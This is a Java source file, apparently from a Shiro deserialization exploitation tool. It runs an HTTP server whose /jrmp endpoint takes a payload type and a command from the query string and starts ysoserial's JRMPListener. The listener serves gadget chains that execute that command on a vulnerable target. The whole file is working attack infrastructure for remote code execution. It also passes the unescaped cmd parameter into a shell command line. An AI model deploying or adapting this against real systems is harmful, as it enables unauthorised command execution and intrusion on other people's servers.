package com.shiroexploit.server;

import com.shiroexploit.util.PayloadType;
import com.shiroexploit.util.Tools;
import com.sun.net.httpserver.HttpContext;
import com.sun.net.httpserver.HttpExchange;
import com.sun.net.httpserver.HttpServer;
import java.io.File;
import java.io.IOException;
import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.net.URI;
import java.util.HashSet;
import java.util.Set;

public class BasicHTTPServer {
    private static int listeningPort = 8080;
    private static int JRMPPort = 8088;
    private static Set<String> memcache = new HashSet<>();
    private static PayloadType payloadType;
    private static String previousType = "";

    public static void main(String[] args) throws IOException {
        //如果命令行指定了参数，就使用命令行指定的参数，否则使用默认值
        if(args.length > 1){
            BasicHTTPServer.listeningPort = Integer.parseInt(args[0]);
            BasicHTTPServer.JRMPPort = Integer.parseInt(args[1]);
        }

        HttpServer httpServer = HttpServer.create(new InetSocketAddress(listeningPort), 0);
        HttpContext contenxt1 = httpServer.createContext("/jrmp");
        contenxt1.setHandler(BasicHTTPServer::handleJRMPRequest);
//        HttpContext contenxt2 = httpServer.createContext("/gadget");
//        contenxt2.setHandler(BasicHTTPServer::handleGadgetRequest);
//        HttpContext contenxt3 = httpServer.createContext("/result");
//        contenxt3.setHandler(BasicHTTPServer::handleResultRequest);
        HttpContext contenxt4 = httpServer.createContext("/echo");
        contenxt4.setHandler(BasicHTTPServer::handleEchoRequest);
        httpServer.start();
        System.out.println("[*] Start HTTP Service at port " + listeningPort);
        System.out.println("[*] JRMP Service will start at port " + JRMPPort);
    }

    private static void handleEchoRequest(HttpExchange exchange) throws IOException{
        String response = "OK";
        exchange.sendResponseHeaders(200, response.getBytes().length);
        OutputStream os = exchange.getResponseBody();
        os.write(response.getBytes());
        os.close();
    }

//    private static void handleResultRequest(HttpExchange exchange) throws IOException{
//        StringBuffer sb = new StringBuffer();
//        for(String str : memcache){
//            sb.append(str);
//            sb.append(",");
//        }
//
//        if(sb.length() > 0){
//            sb.deleteCharAt(sb.length()-1);
//        }
//
//        String response = sb.toString();
//        exchange.sendResponseHeaders(200, response.getBytes().length);
//        OutputStream os = exchange.getResponseBody();
//        os.write(response.getBytes());
//        os.close();
//    }
//
//    private static void handleGadgetRequest(HttpExchange exchange) throws IOException{
//        URI requestURI = exchange.getRequestURI();
//        String query = requestURI.getQuery();
//
//        //type参数只是为了打印，并不实际处理
//        String type = parse(query, "type");
//        String uuid = parse(query,"uuid");
//        if(type != null && isValidParameter(type) && uuid != null){
//            memcache.add(uuid);
//            System.out.println("[+] Received a valid gadget request: " + type);
//        }else{
//            System.out.println("[-] Received a invalid request: " + requestURI);
//        }
//
//        String response = "OK";
//        exchange.sendResponseHeaders(200, response.getBytes().length);
//        OutputStream os = exchange.getResponseBody();
//        os.write(response.getBytes());
//        os.close();
//    }

    private static void handleJRMPRequest(HttpExchange exchange) throws IOException{
        URI requestURI = exchange.getRequestURI();
        String query = requestURI.getQuery();

        Tools.killJRMPListener(BasicHTTPServer.JRMPPort);

        String type = parse(query, "type");
        String cmd = parse(query, "cmd");

        if(type != null && isValidParameter(type) && cmd != null){
//            cmd = URLDecoder.decode(cmd,"UTF-8");
//            cmd = cmd.replace("&type","%26type");
            String finalCmd = cmd;
            Thread thread = new Thread(new Runnable() {
                @Override
                public void run() {
                    String command =  "java -cp \"" + System.getProperty("user.dir") + File.separator + "ysoserial.jar\" ysoserial.exploit.JRMPListener " + BasicHTTPServer.JRMPPort + " " + type + " \"" + finalCmd +"\"";
                    Tools.exec(command);
                }
            });
            thread.start();
            if(!previousType.equalsIgnoreCase(type)){
                System.out.println("[*] Start JRMPListener for paylaod " + type);
                previousType = type;
            }

        }else{
            System.out.println("[-] Received a invalid request: " + requestURI);
        }

        String response = "OK";
        exchange.sendResponseHeaders(200, response.getBytes().length);
        OutputStream os = exchange.getResponseBody();
        os.write(response.getBytes());
        os.close();
    }


    private static String parse(String query, String name){
        try{
            String[] params = query.split("&");
            for(String param : params){
                String[] pair = param.split("=",2);
                String key = pair[0];
                String value = pair[1];
                if(key.equalsIgnoreCase(name)){
                    return value;
                }
            }

            return null;
        }catch(Exception e){
            return null;
        }
    }

    private static boolean isValidParameter(String type){
        for(PayloadType payloadType : PayloadType.values()){
            if(type.equalsIgnoreCase(payloadType.getName())){
                return true;
            }
        }

        return false;
    }
}
